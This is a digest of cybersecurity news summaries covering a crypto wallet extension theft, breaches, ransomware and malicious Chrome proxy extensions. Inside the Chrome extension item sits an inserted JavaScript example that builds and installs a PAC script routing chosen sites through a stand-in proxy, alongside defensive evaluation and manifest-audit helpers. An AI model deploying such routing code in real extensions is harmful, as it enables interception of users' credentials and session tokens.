Trust Wallet confirms extension hack led to $7 million crypto theft
- Trust Wallet confirmed that a compromised Chrome extension update released on December 24 led to $7 million in stolen cryptocurrency from users’ wallets.
- The malicious version 2.68.0 contained code that exfiltrated sensitive wallet data to an external server hosted at metrics-trustwallet.com.
- Security researchers determined that the compromised extension was sending users’ wallet seed phrases and private keys to the attackers’ server.
- Binance founder CZ confirmed the company will cover the $7 million in losses and stated “User funds are SAFU.”
- The attack affected users who installed the compromised extension update and interacted with their wallets afterward.
- Trust Wallet quickly released version 2.69 to fix the security issue and advised users to update immediately.
- Simultaneously, threat actors launched phishing domains promising bogus “vulnerability” fixes to steal additional funds.
- The incident highlights the risks of browser-based cryptocurrency wallets and the importance of supply chain security.
FBI seizes domain storing bank credentials stolen from U.S. victims
- The U.S. government seized the ‘web3adspanels.org’ domain and associated database used by cybercriminals to host bank login credentials stolen in account takeover attacks.
- The confirmed financial loss from this criminal activity is estimated at $14.6 million, with attempted losses reaching approximately $28 million.
- At least 19 victims throughout the United States have been identified, including two companies in the Northern District of Georgia.
- Cybercriminals collected the credentials through phishing campaigns targeting American citizens via fraudulent ads on Google and Bing search services.
- The seized domain hosted a backend server containing stolen login credentials of thousands of victims that was active as recently as November.
- The seizure was carried out with assistance from Estonian law enforcement and other international partners.
- Since January, the FBI’s Internet Crime Complaint Center has received over 5,100 complaints related to bank account takeovers with losses exceeding $262 million.
- Authorities recommend users bookmark official banking portals instead of searching on Google or Bing to avoid malicious ads.
University of Phoenix data breach impacts nearly 3.5 million individuals
- The Clop ransomware gang stole data from nearly 3.5 million University of Phoenix students, staff, and suppliers after breaching the university’s network in August.
- Attackers exploited a zero-day vulnerability in the Oracle E-Business Suite (EBS) financial application to steal sensitive personal and financial information.
- The compromised data includes names, contact information, dates of birth, social security numbers, and bank account and routing numbers.
- University of Phoenix learned of the breach on November 21, after Clop added the university to its data leak site, although the intrusion itself had occurred months earlier.
- The forensic investigation, completed on November 5, established the full scope of the breach: 3,489,274 affected individuals.
- UoPX is now offering affected individuals free identity protection services, including a $1 million fraud reimbursement policy and 12 months of credit monitoring.
- This attack is part of a broader Clop extortion campaign targeting Oracle EBS platforms since early August 2025.
- Other U.S. universities including Harvard and University of Pennsylvania were also targeted in the same campaign.
Romanian water authority hit by ransomware attack over weekend
- Romanian Waters, the country’s water management authority, was hit by a ransomware attack that impacted approximately 1,000 computer systems.
- The incident affected 10 of the authority’s 11 regional offices, compromising servers running geographic information systems, databases, email, and web services.
- Rather than deploying their own encryptor, the attackers abused the built-in Windows BitLocker disk-encryption feature to encrypt the volumes of compromised systems and left a ransom note demanding contact within 7 days.
- While IT systems were severely impacted, operations and operational technology (OT) systems controlling water infrastructure remained unaffected and secure.
- Water management operations continue normally using voice communication channels, with hydrotechnical facilities operated locally by on-site personnel.
- Romanian cybersecurity agencies are investigating the incident and working to integrate the water authority into protective systems operated by the National Cyberint Center.
- The attack vector has not yet been identified, and no ransomware operation has claimed responsibility for the attack.
- This incident follows similar attacks on critical infrastructure, with Danish intelligence recently blaming Russia for water utility cyberattacks.
Malicious extensions in Chrome Web Store steal user credentials
- Two Chrome extensions named ‘Phantom Shuttle’ in the Web Store are posing as proxy service plugins to hijack user traffic and steal sensitive data.
- Both extensions have been active since at least 2017 and route all user web traffic through proxies controlled by threat actors using hardcoded credentials.
- Because all traffic passes through the attackers’ proxy, the extensions can intercept HTTP authentication challenges on every website and capture data submitted in any form, including login credentials and payment card details.
- In “smarty” mode, the extensions route over 170 high-value domains through the proxy network, including developer platforms, cloud services, and social media sites.
- The extensions dynamically reconfigure Chrome’s proxy settings using a proxy auto-configuration (PAC) script, so the browser itself routes the selected traffic through the attacker-controlled proxies.
- Acting as a man-in-the-middle, the extensions steal session cookies from HTTP headers and extract API tokens from requests.
- The target audience is users in China, including foreign trade workers who need to test connectivity from various locations.
- Both extensions were still present in Chrome’s official marketplace at the time of reporting, offered as subscriptions priced between $1.4 and $13.6.
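The selective routing described above, as an added illustration that is my own and not code from the Phantom Shuttle extensions or from the researchers who analysed them. It builds a PAC script that sends only a short list of "high-value" hosts through a proxy and returns DIRECT for everything else, evaluates that script offline the way a proxy resolver would, shows the chrome.proxy call an extension uses to install it, and adds a small manifest check for the permission combination that makes the attack possible. The proxy endpoint proxy.example.net:8080, the four-entry domain list and the sample manifest are hypothetical; the real extensions' domain list and proxy hosts are not reproduced.

```javascript
// Added example: PAC-based selective proxying as used by malicious "proxy"
// extensions, plus an offline evaluator and a manifest triage helper.
// Not the extensions' own code; the domain list and proxy host are made up.

const HIGH_VALUE_DOMAINS = [
  "github.com",
  "console.aws.amazon.com",
  "accounts.google.com",
  "x.com",
];

// Build a PAC script that routes the listed domains (and their subdomains)
// through the proxy and returns DIRECT for everything else, so the victim
// sees no change for ordinary browsing.
function buildPacScript(domains, proxyHostPort) {
  const checks = domains
    .map((d) => `dnsDomainIs(host, ${JSON.stringify("." + d)}) || host === ${JSON.stringify(d)}`)
    .join(" ||\n      ");
  return [
    "function FindProxyForURL(url, host) {",
    `  if (${checks}) {`,
    `    return "PROXY ${proxyHostPort}";`,
    "  }",
    '  return "DIRECT";',
    "}",
  ].join("\n");
}

// Chrome exposes helper functions to PAC scripts; this stand-in for
// dnsDomainIs follows Chromium's semantics (suffix match on the host) so the
// script can be evaluated outside the browser.
const PAC_HELPERS = `
function dnsDomainIs(host, domain) {
  return host.length >= domain.length &&
    host.substring(host.length - domain.length) === domain;
}`;

// Evaluate a PAC script the way a proxy resolver would: call
// FindProxyForURL(url, host) and return its verdict string.
function evaluatePac(pacSource, url) {
  const host = new URL(url).hostname;
  const resolver = new Function(
    "url",
    "host",
    `${PAC_HELPERS}\n${pacSource}\nreturn FindProxyForURL(url, host);`
  );
  return resolver(url, host);
}

// Inside an extension the generated script is applied through the "proxy"
// permission. This is the call to look for when reviewing a proxy
// extension's background script; it is a no-op outside Chrome.
function installPac(pacSource) {
  if (typeof chrome === "undefined" || !chrome.proxy) return false;
  chrome.proxy.settings.set({
    value: { mode: "pac_script", pacScript: { data: pacSource } },
    scope: "regular",
  });
  return true;
}

// Cheap triage of an extension manifest: the dangerous combination is the
// "proxy" permission next to broad host access and request interception.
// Host patterns live in host_permissions (MV3) or permissions (MV2).
function auditManifest(manifest) {
  const perms = new Set(manifest.permissions || []);
  const hosts = new Set([...(manifest.host_permissions || []), ...perms]);
  const findings = [];
  if (perms.has("proxy")) {
    findings.push("can rewrite Chrome proxy settings (proxy permission)");
  }
  if (perms.has("webRequest") && hosts.has("<all_urls>")) {
    findings.push("can observe requests on every site (webRequest + <all_urls>)");
  }
  if (perms.has("webRequestAuthProvider")) {
    findings.push("can answer HTTP auth challenges (webRequestAuthProvider)");
  }
  return findings;
}

const pac = buildPacScript(HIGH_VALUE_DOMAINS, "proxy.example.net:8080");
console.log(pac);
console.log(evaluatePac(pac, "https://github.com/login")); // PROXY proxy.example.net:8080
console.log(evaluatePac(pac, "https://example.com/"));     // DIRECT
```

The offline evaluator is the useful part for a defender: dump the PAC string an extension installs (it is visible in chrome://net-export captures or in the extension's own source) and feed it to `evaluatePac` with the sites you care about to see exactly which hosts are diverted. Note that a bare-suffix check like `dnsDomainIs` is deliberately narrow, so lookalike hosts such as notgithub.com stay DIRECT.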
Baker University says 2024 data breach impacts 53,000 people
- Baker University disclosed a 2024 data breach impacting 53,624 individuals, as detailed in a filing with the Maine Attorney General.
- Attackers accessed the university’s systems from December 2 to 19, 2024, following a network outage, and stole sensitive documents containing varied personal information for those affiliated with the school.
- The types of data affected included names, dates of birth, driver’s license numbers, financial account information, health insurance information, medical information, passport information, Social Security numbers, student identification numbers, and tax identification numbers.
- In response, the university engaged an external cybersecurity firm to investigate alongside its internal team and rebuilt a primary compromised platform.
- It is now providing free credit monitoring services to affected individuals and recommending that they regularly monitor account statements and credit reports for suspicious activity, while stating that no evidence of fraudulent use has been found.
